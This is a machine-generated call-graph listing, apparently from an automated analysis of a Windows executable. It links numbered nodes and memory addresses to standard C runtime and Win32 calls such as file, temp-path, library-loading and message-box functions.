API calls 15570->15574 15573 7ff79f62fe44 15571->15573 15572->15570 15572->15573 15573->15542 15573->15544 15574->15570 15576 7ff79f6391b9 15575->15576 15577 7ff79f6391c3 15575->15577 15576->15577 15581 7ff79f6391de 15576->15581 15578 7ff79f634444 _findclose 11 API calls 15577->15578 15583 7ff79f6391ca 15578->15583 15579 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 15580 7ff79f6391d6 15579->15580 15580->15559 15580->15566 15581->15580 15582 7ff79f634444 _findclose 11 API calls 15581->15582 15582->15583 15583->15579 15617 7ff79f6431cc 15584->15617 15588 7ff79f63d554 15589 7ff79f63d558 15588->15589 15590 7ff79f63d5a9 15588->15590 15591 7ff79f63d574 15588->15591 15589->15559 15670 7ff79f63d098 15590->15670 15666 7ff79f63d354 15591->15666 15595 7ff79f6431cc 38 API calls 15594->15595 15596 7ff79f63d2c6 15595->15596 15597 7ff79f642c14 37 API calls 15596->15597 15599 7ff79f63d316 15597->15599 15598 7ff79f63d31a 15598->15559 15599->15598 15600 7ff79f63d354 45 API calls 15599->15600 15600->15598 15602 7ff79f6431cc 38 API calls 15601->15602 15603 7ff79f63cfe7 15602->15603 15604 7ff79f642c14 37 API calls 15603->15604 15605 7ff79f63d03f 15604->15605 15606 7ff79f63d043 15605->15606 15607 7ff79f63d098 45 API calls 15605->15607 15606->15559 15607->15606 15609 7ff79f63cc49 15608->15609 15610 7ff79f63cc7c 15608->15610 15611 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15609->15611 15612 7ff79f63cc94 15610->15612 15614 7ff79f63cd15 15610->15614 15616 7ff79f63cc75 memcpy_s 15611->15616 15613 7ff79f63cf9c 46 API calls 15612->15613 15613->15616 15615 7ff79f633a20 45 API calls 15614->15615 15614->15616 15615->15616 15616->15559 15618 7ff79f64321f fegetenv 15617->15618 15619 7ff79f64712c 37 API calls 15618->15619 15624 7ff79f643272 15619->15624 15620 7ff79f64328d 15621 7ff79f643362 15620->15621 15630 7ff79f64329f 15620->15630 15622 7ff79f64712c 37 API calls 15621->15622 15625 7ff79f64338c 15622->15625 15623 7ff79f6391ac __std_exception_copy 37 API calls 15633 7ff79f64331d 15623->15633 15624->15620 15624->15621 15626 7ff79f64333c 15624->15626 15627 7ff79f64712c 37 API calls 15625->15627 15629 7ff79f6391ac __std_exception_copy 37 API calls 15626->15629 15631 7ff79f64339d 15627->15631 15628 7ff79f644444 15632 7ff79f639dd0 _wfindfirst32i64 17 API calls 15628->15632 15629->15633 15630->15623 15634 7ff79f647320 20 API calls 15631->15634 15635 7ff79f644459 15632->15635 15633->15628 15636 7ff79f643325 15633->15636 15644 7ff79f643406 memcpy_s 15634->15644 15637 7ff79f62ad80 _wfindfirst32i64 8 API calls 15636->15637 15638 7ff79f63d4f9 15637->15638 15662 7ff79f642c14 15638->15662 15639 7ff79f6437af memcpy_s 15640 7ff79f643aef 15641 7ff79f642d30 37 API calls 15640->15641 15648 7ff79f644207 15641->15648 15642 7ff79f643a9b 15642->15640 15645 7ff79f64445c memcpy_s 37 API calls 15642->15645 15643 7ff79f643447 memcpy_s 15655 7ff79f643d8b memcpy_s 15643->15655 15659 7ff79f6438a3 memcpy_s 15643->15659 15644->15639 15644->15643 15646 7ff79f634444 _findclose 11 API calls 15644->15646 15645->15640 15647 7ff79f643880 15646->15647 15649 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 15647->15649 15650 7ff79f64445c memcpy_s 37 API calls 15648->15650 15661 7ff79f644262 15648->15661 15649->15643 15650->15661 15651 7ff79f6443e8 15652 7ff79f64712c 37 API calls 15651->15652 15652->15636 15653 7ff79f634444 11 API calls _findclose 15653->15655 15654 7ff79f634444 11 API calls _findclose 15654->15659 15655->15640 15655->15642 15655->15653 15657 7ff79f639db0 37 API calls _invalid_parameter_noinfo 15655->15657 15656 7ff79f642d30 37 API calls 15656->15661 15657->15655 15658 7ff79f639db0 37 API calls _invalid_parameter_noinfo 15658->15659 15659->15642 15659->15654 15659->15658 15660 7ff79f64445c memcpy_s 37 API calls 15660->15661 15661->15651 15661->15656 15661->15660 15663 7ff79f642c33 15662->15663 15664 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15663->15664 15665 7ff79f642c5e memcpy_s 15663->15665 15664->15665 15665->15588 15667 7ff79f63d380 memcpy_s 15666->15667 15668 7ff79f633a20 45 API calls 15667->15668 15669 7ff79f63d43a memcpy_s 15667->15669 15668->15669 15669->15589 15671 7ff79f63d0d3 15670->15671 15675 7ff79f63d120 memcpy_s 15670->15675 15672 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15671->15672 15673 7ff79f63d0ff 15672->15673 15673->15589 15674 7ff79f63d18b 15676 7ff79f6391ac __std_exception_copy 37 API calls 15674->15676 15675->15674 15677 7ff79f633a20 45 API calls 15675->15677 15680 7ff79f63d1cd memcpy_s 15676->15680 15677->15674 15678 7ff79f639dd0 _wfindfirst32i64 17 API calls 15679 7ff79f63d278 15678->15679 15680->15678 15683 7ff79f63f0dc WideCharToMultiByte 15681->15683 15685 7ff79f62ffa1 15684->15685 15686 7ff79f62ffb3 15684->15686 15687 7ff79f634444 _findclose 11 API calls 15685->15687 15689 7ff79f62ffc0 15686->15689 15692 7ff79f62fffd 15686->15692 15688 7ff79f62ffa6 15687->15688 15690 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 15688->15690 15691 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15689->15691 15698 7ff79f62ffb1 15690->15698 15691->15698 15693 7ff79f6300a6 15692->15693 15694 7ff79f634444 _findclose 11 API calls 15692->15694 15695 7ff79f634444 _findclose 11 API calls 15693->15695 15693->15698 15696 7ff79f63009b 15694->15696 15697 7ff79f630150 15695->15697 15699 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 15696->15699 15700 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 15697->15700 15698->15420 15699->15693 15700->15698 15702 7ff79f63cb79 15701->15702 15703 7ff79f633a5f 15701->15703 15702->15703 15709 7ff79f642424 15702->15709 15705 7ff79f63cbcc 15703->15705 15706 7ff79f63cbe5 15705->15706 15708 7ff79f633a6f 15705->15708 15706->15708 15753 7ff79f641790 15706->15753 15708->15420 15721 7ff79f63a620 GetLastError 15709->15721 15712 7ff79f64247e 15712->15703 15722 7ff79f63a661 FlsSetValue 15721->15722 15723 7ff79f63a644 FlsGetValue 15721->15723 15725 7ff79f63a673 15722->15725 15741 7ff79f63a651 15722->15741 15724 7ff79f63a65b 15723->15724 15723->15741 15724->15722 15727 7ff79f63dd40 _findclose 11 API calls 15725->15727 15726 7ff79f63a6cd SetLastError 15728 7ff79f63a6da 15726->15728 15729 7ff79f63a6ed 15726->15729 15730 7ff79f63a682 15727->15730 15728->15712 15743 7ff79f63f788 EnterCriticalSection 15728->15743 15744 7ff79f63920c 15729->15744 15732 7ff79f63a6a0 FlsSetValue 15730->15732 15733 7ff79f63a690 FlsSetValue 15730->15733 15734 7ff79f63a6be 15732->15734 15735 7ff79f63a6ac FlsSetValue 15732->15735 15737 7ff79f63a699 15733->15737 15738 7ff79f63a3c4 _findclose 11 API calls 15734->15738 15735->15737 15739 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15737->15739 15740 7ff79f63a6c6 15738->15740 15739->15741 15742 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15740->15742 15741->15726 15742->15726 15745 7ff79f642770 _CreateFrameInfo EnterCriticalSection LeaveCriticalSection 15744->15745 15746 7ff79f639215 15745->15746 15747 7ff79f639224 15746->15747 15748 7ff79f6427c0 _CreateFrameInfo 44 API calls 15746->15748 15749 7ff79f63922d IsProcessorFeaturePresent 15747->15749 15751 7ff79f639257 _CreateFrameInfo 15747->15751 15748->15747 15750 7ff79f63923c 15749->15750 15752 7ff79f639ae4 _wfindfirst32i64 14 API calls 15750->15752 15752->15751 15754 7ff79f63a620 _CreateFrameInfo 45 API calls 15753->15754 15755 7ff79f641799 15754->15755 15763 7ff79f6342ec EnterCriticalSection 15756->15763 15765 7ff79f6224ec 15764->15765 15766 7ff79f633be4 49 API calls 15765->15766 15767 7ff79f62253f 15766->15767 15768 7ff79f634444 _findclose 11 API calls 15767->15768 15769 7ff79f622544 15768->15769 15783 7ff79f634464 15769->15783 15772 7ff79f621b30 49 API calls 15773 7ff79f622573 memcpy_s 15772->15773 15774 7ff79f627a30 57 API calls 15773->15774 15775 7ff79f6225a0 15774->15775 15776 7ff79f6225df MessageBoxA 15775->15776 15777 7ff79f6225a5 15775->15777 15779 7ff79f6225f9 15776->15779 15778 7ff79f627a30 57 API calls 15777->15778 15780 7ff79f6225bf MessageBoxW 15778->15780 15781 7ff79f62ad80 _wfindfirst32i64 8 API calls 15779->15781 15780->15779 15782 7ff79f622609 15781->15782 15782->15045 15784 7ff79f63a798 _findclose 11 API calls 15783->15784 15785 7ff79f63447b 15784->15785 15786 7ff79f63dd40 _findclose 11 API calls 15785->15786 15788 7ff79f6344bb 15785->15788 15792 7ff79f62254b 15785->15792 15787 7ff79f6344b0 15786->15787 15789 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15787->15789 15788->15792 15795 7ff79f63e418 15788->15795 15789->15788 15792->15772 15793 7ff79f639dd0 _wfindfirst32i64 17 API calls 15794 7ff79f634500 15793->15794 15798 7ff79f63e435 15795->15798 15796 7ff79f63e43a 15797 7ff79f634444 _findclose 11 API calls 15796->15797 15800 7ff79f6344e1 15796->15800 15803 7ff79f63e444 15797->15803 15798->15796 15798->15800 15801 7ff79f63e484 15798->15801 15799 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 15799->15800 15800->15792 15800->15793 15801->15800 15802 7ff79f634444 _findclose 11 API calls 15801->15802 15802->15803 15803->15799 15805 7ff79f627bd2 WideCharToMultiByte 15804->15805 15806 7ff79f627b64 WideCharToMultiByte 15804->15806 15807 7ff79f627bff 15805->15807 15811 7ff79f623c05 15805->15811 15808 7ff79f627b8e 15806->15808 15812 7ff79f627ba5 15806->15812 15809 7ff79f622620 57 API calls 15807->15809 15810 7ff79f622620 57 API calls 15808->15810 15809->15811 15810->15811 15811->15054 15811->15056 15812->15805 15813 7ff79f627bbb 15812->15813 15814 7ff79f622620 57 API calls 15813->15814 15814->15811 15816 7ff79f626a0e 15815->15816 15817 7ff79f639123 15815->15817 15816->15075 15817->15816 15818 7ff79f6391ac __std_exception_copy 37 API calls 15817->15818 15819 7ff79f639150 15818->15819 15819->15816 15820 7ff79f639dd0 _wfindfirst32i64 17 API calls 15819->15820 15821 7ff79f639180 15820->15821 15823 7ff79f6217e4 15822->15823 15824 7ff79f6217d4 15822->15824 15826 7ff79f627200 83 API calls 15823->15826 15855 7ff79f621842 15823->15855 15825 7ff79f623cb0 116 API calls 15824->15825 15825->15823 15827 7ff79f621815 15826->15827 15827->15855 15856 7ff79f62f934 15827->15856 15829 7ff79f62182b 15831 7ff79f62184c 15829->15831 15832 7ff79f62182f 15829->15832 15830 7ff79f62ad80 _wfindfirst32i64 8 API calls 15833 7ff79f6219c0 15830->15833 15860 7ff79f62f5fc 15831->15860 15834 7ff79f6224d0 59 API calls 15832->15834 15833->15090 15833->15091 15834->15855 15837 7ff79f621867 15839 7ff79f6224d0 59 API calls 15837->15839 15838 7ff79f62f934 73 API calls 15840 7ff79f6218d1 15838->15840 15839->15855 15841 7ff79f6218fe 15840->15841 15842 7ff79f6218e3 15840->15842 15844 7ff79f62f5fc _fread_nolock 53 API calls 15841->15844 15843 7ff79f6224d0 59 API calls 15842->15843 15843->15855 15845 7ff79f621913 15844->15845 15845->15837 15846 7ff79f621925 15845->15846 15863 7ff79f62f370 15846->15863 15849 7ff79f62193d 15850 7ff79f622770 59 API calls 15849->15850 15850->15855 15851 7ff79f621993 15853 7ff79f62f2ac 74 API calls 15851->15853 15851->15855 15852 7ff79f621950 15852->15851 15854 7ff79f622770 59 API calls 15852->15854 15853->15855 15854->15851 15855->15830 15857 7ff79f62f964 15856->15857 15869 7ff79f62f6c4 15857->15869 15859 7ff79f62f97d 15859->15829 15881 7ff79f62f61c 15860->15881 15864 7ff79f62f379 15863->15864 15865 7ff79f621939 15863->15865 15866 7ff79f634444 _findclose 11 API calls 15864->15866 15865->15849 15865->15852 15867 7ff79f62f37e 15866->15867 15868 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 15867->15868 15868->15865 15870 7ff79f62f72e 15869->15870 15871 7ff79f62f6ee 15869->15871 15870->15871 15873 7ff79f62f73a 15870->15873 15872 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 15871->15872 15879 7ff79f62f715 15872->15879 15880 7ff79f6342ec EnterCriticalSection 15873->15880 15879->15859 15882 7ff79f621861 15881->15882 15883 7ff79f62f646 15881->15883 15882->15837 15882->15838 15883->15882 15884 7ff79f62f692 15883->15884 15885 7ff79f62f655 memcpy_s 15883->15885 15894 7ff79f6342ec EnterCriticalSection 15884->15894 15888 7ff79f634444 _findclose 11 API calls 15885->15888 15890 7ff79f62f66a 15888->15890 15892 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 15890->15892 15892->15882 15988 7ff79f626720 15895->15988 15897 7ff79f621454 15898 7ff79f621459 15897->15898 15997 7ff79f626a40 15897->15997 15898->15116 15901 7ff79f6214a7 15904 7ff79f6214e0 15901->15904 15906 7ff79f623cb0 116 API calls 15901->15906 15902 7ff79f621487 15903 7ff79f6224d0 59 API calls 15902->15903 15905 7ff79f62149d 15903->15905 15907 7ff79f62f934 73 API calls 15904->15907 15905->15116 15909 7ff79f6214bf 15906->15909 15908 7ff79f6214f2 15907->15908 15910 7ff79f621516 15908->15910 15911 7ff79f6214f6 15908->15911 15909->15904 15912 7ff79f6214c7 15909->15912 15914 7ff79f62151c 15910->15914 15915 7ff79f621534 15910->15915 15913 7ff79f6224d0 59 API calls 15911->15913 15916 7ff79f622770 59 API calls 15912->15916 15928 7ff79f6214d6 __std_exception_destroy 15913->15928 16022 7ff79f621050 15914->16022 15919 7ff79f621556 15915->15919 15924 7ff79f621575 15915->15924 15916->15928 15918 7ff79f621624 15921 7ff79f62f2ac 74 API calls 15918->15921 15922 7ff79f6224d0 59 API calls 15919->15922 15920 7ff79f62f2ac 74 API calls 15920->15918 15921->15905 15922->15928 15923 7ff79f62f5fc _fread_nolock 53 API calls 15923->15924 15924->15923 15927 7ff79f6215d5 15924->15927 15924->15928 16040 7ff79f62fd3c 15924->16040 15926 7ff79f6224d0 59 API calls 15926->15928 15927->15926 15928->15918 15928->15920 15930 7ff79f6229a6 15929->15930 15931 7ff79f621b30 49 API calls 15930->15931 15933 7ff79f6229db 15931->15933 15932 7ff79f622de1 15933->15932 15934 7ff79f623b20 49 API calls 15933->15934 15935 7ff79f622a4f 15934->15935 16619 7ff79f622e00 15935->16619 15938 7ff79f622aca 15940 7ff79f622e00 75 API calls 15938->15940 15939 7ff79f622a91 15941 7ff79f626720 98 API calls 15939->15941 15942 7ff79f622b1c 15940->15942 15943 7ff79f622a99 15941->15943 15944 7ff79f622b20 15942->15944 15945 7ff79f622b86 15942->15945 15946 7ff79f622aba 15943->15946 16627 7ff79f626600 15943->16627 15947 7ff79f626720 98 API calls 15944->15947 15950 7ff79f622e00 75 API calls 15945->15950 15948 7ff79f622770 59 API calls 15946->15948 15953 7ff79f622ac3 15946->15953 15952 7ff79f622b28 15947->15952 15948->15953 15951 7ff79f622bb2 15950->15951 15954 7ff79f622c12 15951->15954 15955 7ff79f622e00 75 API calls 15951->15955 15952->15946 15956 7ff79f626600 138 API calls 15952->15956 15958 7ff79f62ad80 _wfindfirst32i64 8 API calls 15953->15958 15954->15932 15957 7ff79f626720 98 API calls 15954->15957 15959 7ff79f622be2 15955->15959 15960 7ff79f622b45 15956->15960 15965 7ff79f622c22 15957->15965 15961 7ff79f622b7b 15958->15961 15959->15954 15963 7ff79f622e00 75 API calls 15959->15963 15960->15946 15962 7ff79f622dc6 15960->15962 15961->15116 15963->15954 15965->15932 15985 7ff79f621795 15984->15985 15987 7ff79f6217a1 15984->15987 15986 7ff79f622770 59 API calls 15985->15986 15986->15987 15987->15116 15989 7ff79f626732 15988->15989 15994 7ff79f626768 15988->15994 16044 7ff79f6216d0 15989->16044 15994->15897 15998 7ff79f626a50 15997->15998 15999 7ff79f621b30 49 API calls 15998->15999 16000 7ff79f626a81 15999->16000 16001 7ff79f626c4b 16000->16001 16002 7ff79f621b30 49 API calls 16000->16002 16003 7ff79f62ad80 _wfindfirst32i64 8 API calls 16001->16003 16005 7ff79f626aa8 16002->16005 16004 7ff79f62147f 16003->16004 16004->15901 16004->15902 16005->16001 16569 7ff79f6350e8 16005->16569 16007 7ff79f626bb9 16008 7ff79f627a30 57 API calls 16007->16008 16010 7ff79f626bd1 16008->16010 16009 7ff79f626c7a 16011 7ff79f623cb0 116 API calls 16009->16011 16010->16009 16014 7ff79f626990 61 API calls 16010->16014 16018 7ff79f626c02 __std_exception_destroy 16010->16018 16011->16001 16012 7ff79f626c6e 16017 7ff79f622880 59 API calls 16012->16017 16013 7ff79f626c3f 16578 7ff79f622880 16013->16578 16014->16018 16016 7ff79f626add 16016->16001 16016->16007 16019 7ff79f6350e8 49 API calls 16016->16019 16020 7ff79f627a30 57 API calls 16016->16020 16021 7ff79f6278a0 58 API calls 16016->16021 16017->16009 16018->16012 16018->16013 16019->16016 16020->16016 16021->16016 16023 7ff79f6210a6 16022->16023 16024 7ff79f6210ad 16023->16024 16025 7ff79f6210d3 16023->16025 16026 7ff79f622770 59 API calls 16024->16026 16028 7ff79f621109 16025->16028 16029 7ff79f6210ed 16025->16029 16027 7ff79f6210c0 16026->16027 16027->15928 16031 7ff79f62111b 16028->16031 16039 7ff79f621137 memcpy_s 16028->16039 16030 7ff79f6224d0 59 API calls 16029->16030 16035 7ff79f621104 __std_exception_destroy 16030->16035 16032 7ff79f6224d0 59 API calls 16031->16032 16032->16035 16033 7ff79f62f5fc _fread_nolock 53 API calls 16033->16039 16034 7ff79f62f370 37 API calls 16034->16039 16035->15928 16036 7ff79f6211fe 16038 7ff79f62fd3c 76 API calls 16038->16039 16039->16033 16039->16034 16039->16035 16039->16036 16039->16038 16041 7ff79f62fd6c 16040->16041 16604 7ff79f62fa8c 16041->16604 16046 7ff79f6216f5 16044->16046 16045 7ff79f621738 16048 7ff79f626780 16045->16048 16046->16045 16047 7ff79f622770 59 API calls 16046->16047 16047->16045 16049 7ff79f626798 16048->16049 16050 7ff79f6267b8 16049->16050 16051 7ff79f62680b 16049->16051 16053 7ff79f626990 61 API calls 16050->16053 16052 7ff79f626810 GetTempPathW 16051->16052 16054 7ff79f626825 16052->16054 16055 7ff79f6267c4 16053->16055 16088 7ff79f622470 16054->16088 16112 7ff79f626480 16055->16112 16060 7ff79f62ad80 _wfindfirst32i64 8 API calls 16063 7ff79f62674d 16060->16063 16063->15994 16067 7ff79f62683e __std_exception_destroy 16068 7ff79f6268e6 16067->16068 16071 7ff79f626871 16067->16071 16092 7ff79f63736c 16067->16092 16095 7ff79f6278a0 16067->16095 16070 7ff79f627b40 59 API calls 16068->16070 16072 7ff79f627a30 57 API calls 16071->16072 16087 7ff79f6268aa __std_exception_destroy 16071->16087 16087->16060 16089 7ff79f622495 16088->16089 16146 7ff79f633e38 16089->16146 16113 7ff79f62648c 16112->16113 16114 7ff79f627a30 57 API calls 16113->16114 16115 7ff79f6264ae 16114->16115 16116 7ff79f6264c9 ExpandEnvironmentStringsW 16115->16116 16117 7ff79f6264b6 16115->16117 16119 7ff79f6264ef __std_exception_destroy 16116->16119 16118 7ff79f622770 59 API calls 16117->16118 16120 7ff79f6264c2 16118->16120 16121 7ff79f6264f3 16119->16121 16122 7ff79f626506 16119->16122 16123 7ff79f62ad80 _wfindfirst32i64 8 API calls 16120->16123 16124 7ff79f622770 59 API calls 16121->16124 16126 7ff79f626520 16122->16126 16127 7ff79f626514 16122->16127 16125 7ff79f6265e8 16123->16125 16124->16120 16125->16087 16136 7ff79f6366b4 16125->16136 16460 7ff79f635348 16126->16460 16453 7ff79f635f44 16127->16453 16130 7ff79f62651e 16131 7ff79f62653a 16130->16131 16134 7ff79f62654d memcpy_s 16130->16134 16137 7ff79f6366c1 16136->16137 16138 7ff79f6366d4 16136->16138 16140 7ff79f634444 _findclose 11 API calls 16137->16140 16561 7ff79f636338 16138->16561 16149 7ff79f633e92 16146->16149 16147 7ff79f633eb7 16148 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 16147->16148 16152 7ff79f633ee1 16148->16152 16149->16147 16150 7ff79f633ef3 16149->16150 16164 7ff79f6321f0 16150->16164 16155 7ff79f62ad80 _wfindfirst32i64 8 API calls 16152->16155 16153 7ff79f633fd4 16154 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16153->16154 16154->16152 16157 7ff79f6224b4 16155->16157 16157->16067 16158 7ff79f633fa9 16162 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16158->16162 16159 7ff79f633ffa 16159->16153 16161 7ff79f634004 16159->16161 16160 7ff79f633fa0 16160->16153 16160->16158 16163 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16161->16163 16162->16152 16163->16152 16165 7ff79f63222e 16164->16165 16166 7ff79f63221e 16164->16166 16167 7ff79f632237 16165->16167 16171 7ff79f632265 16165->16171 16170 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 16166->16170 16168 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 16167->16168 16169 7ff79f63225d 16168->16169 16169->16153 16169->16158 16169->16159 16169->16160 16170->16169 16171->16166 16171->16169 16175 7ff79f632c04 16171->16175 16208 7ff79f632650 16171->16208 16245 7ff79f631de0 16171->16245 16176 7ff79f632cb7 16175->16176 16177 7ff79f632c46 16175->16177 16178 7ff79f632cbc 16176->16178 16179 7ff79f632d10 16176->16179 16180 7ff79f632c4c 16177->16180 16181 7ff79f632ce1 16177->16181 16184 7ff79f632cbe 16178->16184 16185 7ff79f632cf1 16178->16185 16186 7ff79f632d27 16179->16186 16188 7ff79f632d1a 16179->16188 16193 7ff79f632d1f 16179->16193 16182 7ff79f632c51 16180->16182 16183 7ff79f632c80 16180->16183 16264 7ff79f630fb4 16181->16264 16182->16186 16183->16193 16188->16181 16188->16193 16209 7ff79f63265e 16208->16209 16210 7ff79f632674 16208->16210 16212 7ff79f6326b4 16209->16212 16213 7ff79f632cb7 16209->16213 16214 7ff79f632c46 16209->16214 16211 7ff79f639ce4 _invalid_parameter_noinfo 37 API calls 16210->16211 16210->16212 16211->16212 16212->16171 16215 7ff79f632cbc 16213->16215 16301 7ff79f630228 16245->16301 16302 7ff79f63025d 16301->16302 16303 7ff79f63026f 16301->16303 16304 7ff79f634444 _findclose 11 API calls 16302->16304 16306 7ff79f63027d 16303->16306 16310 7ff79f6302b9 16303->16310 16454 7ff79f635f62 16453->16454 16457 7ff79f635f95 16453->16457 16454->16457 16472 7ff79f63f924 16454->16472 16457->16130 16461 7ff79f6353d2 16460->16461 16462 7ff79f635364 16460->16462 16506 7ff79f63f090 16461->16506 16462->16461 16464 7ff79f635369 16462->16464 16465 7ff79f63539e 16464->16465 16466 7ff79f635381 16464->16466 16570 7ff79f63a620 _CreateFrameInfo 45 API calls 16569->16570 16571 7ff79f6350fd 16570->16571 16572 7ff79f63ee97 16571->16572 16576 7ff79f63edb6 16571->16576 16591 7ff79f62af14 16572->16591 16575 7ff79f62ad80 _wfindfirst32i64 8 API calls 16577 7ff79f63ee8f 16575->16577 16576->16575 16577->16016 16594 7ff79f62af28 IsProcessorFeaturePresent 16591->16594 16595 7ff79f62af3f 16594->16595 16600 7ff79f62afc4 RtlCaptureContext RtlLookupFunctionEntry 16595->16600 16601 7ff79f62af53 16600->16601 16602 7ff79f62aff4 RtlVirtualUnwind 16600->16602 16603 7ff79f62ae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16601->16603 16602->16601 16605 7ff79f62fad9 16604->16605 16606 7ff79f62faac 16604->16606 16606->16605 16620 7ff79f622e34 16619->16620 16621 7ff79f633be4 49 API calls 16620->16621 16622 7ff79f622e5a 16621->16622 16623 7ff79f622e6b 16622->16623 16651 7ff79f634e08 16622->16651 16625 7ff79f62ad80 _wfindfirst32i64 8 API calls 16623->16625 16626 7ff79f622a8d 16625->16626 16626->15938 16626->15939 16628 7ff79f62660e 16627->16628 16629 7ff79f623cb0 116 API calls 16628->16629 16630 7ff79f626635 16629->16630 16631 7ff79f626a40 136 API calls 16630->16631 16632 7ff79f626643 16631->16632 16652 7ff79f634e31 16651->16652 16653 7ff79f634e25 16651->16653 16693 7ff79f634a1c 16652->16693 16668 7ff79f634680 16653->16668 16660 7ff79f634e69 16704 7ff79f634504 16660->16704 16661 7ff79f634ed9 16664 7ff79f634680 69 API calls 16661->16664 16662 7ff79f634ec5 16663 7ff79f634e2a 16662->16663 16665 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16662->16665 16663->16623 16666 7ff79f634ee5 16664->16666 16665->16663 16666->16663 16667 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16666->16667 16667->16663 16669 7ff79f63469a 16668->16669 16670 7ff79f6346b7 16668->16670 16671 7ff79f634424 _fread_nolock 11 API calls 16669->16671 16670->16669 16672 7ff79f6346ca CreateFileW 16670->16672 16673 7ff79f63469f 16671->16673 16674 7ff79f6346fe 16672->16674 16675 7ff79f634734 16672->16675 16678 7ff79f634444 _findclose 11 API calls 16673->16678 16726 7ff79f6347d4 GetFileType 16674->16726 16752 7ff79f634cf8 16675->16752 16681 7ff79f6346a7 16678->16681 16686 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 16681->16686 16684 7ff79f634768 16773 7ff79f634ab8 16684->16773 16685 7ff79f63473d 16688 7ff79f6343b8 _fread_nolock 11 API calls 16685->16688 16687 7ff79f6346b2 16686->16687 16687->16663 16694 7ff79f634a40 16693->16694 16700 7ff79f634a3b 16693->16700 16695 7ff79f63a620 _CreateFrameInfo 45 API calls 16694->16695 16694->16700 16696 7ff79f634a5b 16695->16696 16814 7ff79f63cb2c 16696->16814 16700->16660 16701 7ff79f63dfcc 16700->16701 16822 7ff79f63ddb8 16701->16822 16705 7ff79f63452e 16704->16705 16706 7ff79f634552 16704->16706 16710 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16705->16710 16712 7ff79f63453d 16705->16712 16707 7ff79f634557 16706->16707 16708 7ff79f6345ac 16706->16708 16711 7ff79f63456c 16707->16711 16707->16712 16713 7ff79f639e18 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16707->16713 16831 7ff79f63e7f0 16708->16831 16710->16712 16714 7ff79f63cacc _fread_nolock 12 API calls 16711->16714 16712->16661 16712->16662 16713->16711 16714->16712 16727 7ff79f634822 16726->16727 16728 7ff79f6348df 16726->16728 16729 7ff79f63484e GetFileInformationByHandle 16727->16729 16732 7ff79f634bf4 21 API calls 16727->16732 16730 7ff79f634909 16728->16730 16731 7ff79f6348e7 16728->16731 16733 7ff79f6348fa GetLastError 16729->16733 16734 7ff79f634877 16729->16734 16736 7ff79f63492c PeekNamedPipe 16730->16736 16743 7ff79f6348ca 16730->16743 16731->16733 16735 7ff79f6348eb 16731->16735 16737 7ff79f63483c 16732->16737 16740 7ff79f6343b8 _fread_nolock 11 API calls 16733->16740 16738 7ff79f634ab8 51 API calls 16734->16738 16739 7ff79f634444 _findclose 11 API calls 16735->16739 16736->16743 16737->16729 16737->16743 16742 7ff79f634882 16738->16742 16739->16743 16740->16743 16741 7ff79f62ad80 _wfindfirst32i64 8 API calls 16744 7ff79f63470c 16741->16744 16743->16741 16753 7ff79f634d2e 16752->16753 16754 7ff79f634444 _findclose 11 API calls 16753->16754 16772 7ff79f634dc6 __std_exception_destroy 16753->16772 16756 7ff79f634d40 16754->16756 16755 7ff79f62ad80 _wfindfirst32i64 8 API calls 16757 7ff79f634739 16755->16757 16758 7ff79f634444 _findclose 11 API calls 16756->16758 16757->16684 16757->16685 16759 7ff79f634d48 16758->16759 16772->16755 16815 7ff79f634a7e 16814->16815 16816 7ff79f63cb41 16814->16816 16818 7ff79f63cb98 16815->16818 16816->16815 16817 7ff79f642424 45 API calls 16816->16817 16817->16815 16819 7ff79f63cbad 16818->16819 16820 7ff79f63cbc0 16818->16820 16819->16820 16821 7ff79f641790 45 API calls 16819->16821 16820->16700 16821->16820 16823 7ff79f63de15 16822->16823 16829 7ff79f63de10 __vcrt_InitializeCriticalSectionEx 16822->16829 16823->16660 16824 7ff79f63de45 LoadLibraryExW 16826 7ff79f63df1a 16824->16826 16827 7ff79f63de6a GetLastError 16824->16827 16825 7ff79f63df3a GetProcAddress 16825->16823 16826->16825 16828 7ff79f63df31 FreeLibrary 16826->16828 16827->16829 16828->16825 16829->16823 16829->16824 16829->16825 16830 7ff79f63dea4 LoadLibraryExW 16829->16830 16830->16826 16830->16829 16833 7ff79f63e7f9 MultiByteToWideChar 16831->16833 16861 7ff79f63918d 16860->16861 16862 7ff79f62707a 16860->16862 16863 7ff79f634444 _findclose 11 API calls 16861->16863 16866 7ff79f636ef8 16862->16866 16864 7ff79f639192 16863->16864 16867 7ff79f636f01 16866->16867 16868 7ff79f636f16 16866->16868 16879 7ff79f6353fc 16878->16879 16880 7ff79f635422 16879->16880 16883 7ff79f635455 16879->16883 16881 7ff79f634444 _findclose 11 API calls 16880->16881 16882 7ff79f635427 16881->16882 16884 7ff79f639db0 _invalid_parameter_noinfo 37 API calls 16882->16884 16885 7ff79f635468 16883->16885 16886 7ff79f63545b 16883->16886 16887 7ff79f623d09 16884->16887 16897 7ff79f63a0f8 16885->16897 